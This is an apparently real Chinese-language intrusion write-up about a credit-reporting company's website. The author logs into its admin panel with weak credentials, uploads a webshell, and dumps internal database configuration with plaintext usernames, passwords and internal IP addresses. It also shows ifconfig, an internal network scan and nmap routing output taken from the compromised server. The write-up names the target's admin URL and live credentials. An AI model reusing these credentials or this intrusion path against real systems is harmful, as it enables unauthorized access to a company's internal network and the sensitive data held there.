找了半天,终于找到了后台。为什么要后台了?你完全可以做成静态的。征信的主页基本都这样。主站啊,不能打脸了。 http://www.ccxcredit.com.cn/u_l 既然密码是: admin 123456(还让我跑了10W的字典,shit,sun of bitch/) 我的灵感告诉我,这种站,后台有上传肯定可以getshell
找到了上传的。应该可以上传JS判定。
拿到shell
找一些内网的信息:
#mysql config db.driver.class=com.mysql.jdbc.Driver #db.url=jdbc:mysql://localhost:3306/zx_news_db #db.username=admin #db.password=admin db.url=jdbc:mysql://10.1.80.37:3306/zx_news_db?useUnicode=true&characterEncoding=UTF-8 db.username=test db.password=test #db.url=jdbc:mysql://10.0.5.152:3306/zx_news_db #db.username=root #db.password=123456 #oracle config #db.driver.class = oracle.jdbc.driver.OracleDriver #db.url = jdbc:oracle:thin:@10.0.1.40:1521:ccxe #db.username = pccredit #db.password = pccredit #db.schema = PCCREDIT #org upload file dir org_file_path = resources/file_uploads #nh xw score model supply project 1nh_xw_score_model_supplier = http://10.0.5.152:8080/ccx_credit_nm_20141210
ifconfig [/usr/tips/apache-tomcat-7.0.59/webapps/ccxportal/attached/image/20160127/]$ ifconfig bond0 Link encap:Ethernet HWaddr D4:85:64:48:E5:D8 inet addr:10.1.80.37 Bcast:10.1.80.255 Mask:255.255.255.0 inet6 addr: fe80::d685:64ff:fe48:e5d8/64 Scope:Link UP BROADCAST RUNNING MASTER MULTICAST MTU:1500 Metric:1 RX packets:215013915 errors:0 dropped:0 overruns:0 frame:0 TX packets:105061985 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:19123235861 (17.8 GiB) TX bytes:112949825904 (105.1 GiB) eth0 Link encap:Ethernet HWaddr D4:85:64:48:E5:D8 UP BROADCAST RUNNING SLAVE MULTICAST MTU:1500 Metric:1 RX packets:150213515 errors:0 dropped:0 overruns:0 frame:0 TX packets:105061984 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:14426070048 (13.4 GiB) TX bytes:112949825810 (105.1 GiB) Interrupt:114 Memory:fb000000-fb7fffff eth1 Link encap:Ethernet HWaddr D4:85:64:48:E5:D8 UP BROADCAST RUNNING SLAVE MULTICAST MTU:1500 Metric:1 RX packets:64800400 errors:0 dropped:0 overruns:0 frame:0 TX packets:1 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:4697165813 (4.3 GiB) TX bytes:94 (94.0 b) Interrupt:122 Memory:fa000000-fa7fffff lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:20860426 errors:0 dropped:0 overruns:0 frame:0 TX packets:20860426 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:24514978721 (22.8 GiB) TX bytes:24514978721 (22.8 GiB)
征信的怎么能用这样的密码。。。这样的网络结构。。。 征信要等保三级。这怎么能过的。 扫一下网段信息。
http://10.1.80.37 >> 中诚信征信有限公司>>Apache-Coyote/1.1 >>Success http://10.1.80.45 >> Insert title here>>Apache-Coyote/1.1 >>Success http://10.1.80.21 >> >>Serv-U/10.5.0.11 >>Success http://10.1.80.3 >> Log In - Juniper Web Device Manager>>Mbedthis-Appweb/2.4.0 >>Success http://10.1.80.2 >> Log In - Juniper Web Device Manager>>Mbedthis-Appweb/2.4.0 >>Success http://10.1.80.1 >> Log In - Juniper Web Device Manager>>Mbedthis-Appweb/2.4.0 >>Success http://10.0.5.254 >> Log In - Juniper Web Device Manager>>Mbedthis-Appweb/2.4.0 >>Success 10.1.130.56 http://10.1.130.57 >> phpinfo()>>Apache/2.2.3 (Red Hat) >>Success http://10.1.130.55 >> >>Apache/2.2.6 (Win32) mod_jk/1.2.21 >>Success http://10.1.130.159 >> 302 Found>>Apache >>Success http://10.1.130.111 >> >>Apache >>Success http://10.1.130.156 >> 302 Found>>Apache >>Success http://10.1.130.112 >> >>Apache >>Success http://10.0.1.22 >> >>Apache/2.2.12 (Ubuntu) >>Success http://10.0.1.28 >> IIS7>>Microsoft-IIS/7.5 >>Success http://10.0.1.250 >> Index>>Hikvision-Webs >>Success http://10.0.1.254 >> Log In - Juniper Web Device Manager>>Mbedthis-Appweb/2.4.0 >>Success (APP生产网断) http://10.0.5.254 >> Log In - Juniper Web Device Manager>>Mbedthis-Appweb/2.4.0 >>Success
既然网段没有隔离。 WAF了?IDS?IPS?防火墙?专网?VDI?为什么都没有限制? [/usr/tips/apache-tomcat-7.0.59/webapps/ccxportal/attached/image/20160127/]$ nmap -iflist Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2016-01-27 14:01 CST ************************INTERFACES************************ DEV (SHORT) IP/MASK TYPE UP MAC lo (lo) 127.0.0.1/8 loopback up bond0 (bond0) 10.1.80.37/24 ethernet up D4:85:64:48:E5:D8 **************************ROUTES************************** DST/MASK DEV GATEWAY 10.1.80.0/0 bond0 169.254.0.0/0 bond0 0.0.0.0/0 bond0 10.1.80.1 我的天了。